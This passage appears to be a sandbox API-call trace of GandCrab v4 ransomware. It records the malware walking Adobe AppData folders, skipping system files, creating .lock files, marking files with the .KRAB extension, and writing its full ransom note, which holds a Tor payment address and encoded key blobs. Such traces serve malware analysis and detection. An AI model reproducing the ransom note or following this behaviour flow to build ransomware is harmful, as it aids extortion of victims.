(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\KRAB-DECRYPT.txt") returned 60 [0056.951] lstrlenW (lpString=".txt") returned 4 [0056.951] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.951] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.952] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\KRAB-DECRYPT.txt") returned 60 [0056.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\KRAB-DECRYPT.txt") returned 60 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.952] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.952] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.953] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0056.953] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0056.953] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0056.953] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Linguistics" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics" [0056.953] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\" [0056.953] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.953] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.954] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.954] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\\\KRAB-DECRYPT.txt") returned 73 [0056.954] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\linguistics\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0056.957] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.957] WriteFile (in: hFile=0x430, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0056.958] CloseHandle (hObject=0x430) returned 1 [0056.958] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.958] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.958] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x9b)) [0056.958] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.959] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0056.959] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0056.959] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a08d2ca4dee3d.lock") returned 79 [0056.959] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\linguistics\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x430 [0056.962] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.962] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.962] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 56 [0056.962] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0056.962] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbe0a0 [0056.963] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.963] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.963] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.963] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.963] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.963] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0056.963] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0056.963] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a08d2ca4dee3d.lock" [0056.963] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.963] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 84 [0056.963] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a08d2ca4dee3d.lock") returned 79 [0056.963] lstrlenW (lpString=".lock") returned 5 [0056.963] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.964] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0056.964] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.964] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.964] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0056.964] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0056.965] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0056.965] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\KRAB-DECRYPT.txt" [0056.965] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.965] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\KRAB-DECRYPT.txt.KRAB") returned 77 [0056.965] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\KRAB-DECRYPT.txt") returned 72 [0056.965] lstrlenW (lpString=".txt") returned 4 [0056.965] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0056.965] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".txt ") returned 5 [0056.965] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\KRAB-DECRYPT.txt") returned 72 [0056.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\KRAB-DECRYPT.txt") returned 72 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0056.966] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0056.966] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.966] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0056.966] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0056.967] CloseHandle (hObject=0x430) returned 1 [0056.967] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0056.967] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0056.967] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0056.967] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="LogTransport2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2" [0056.967] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0056.967] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0056.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0056.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0056.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0056.967] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0056.968] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0056.968] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0056.968] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\\\KRAB-DECRYPT.txt") returned 75 [0056.968] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0056.987] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0056.987] WriteFile (in: hFile=0x430, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, 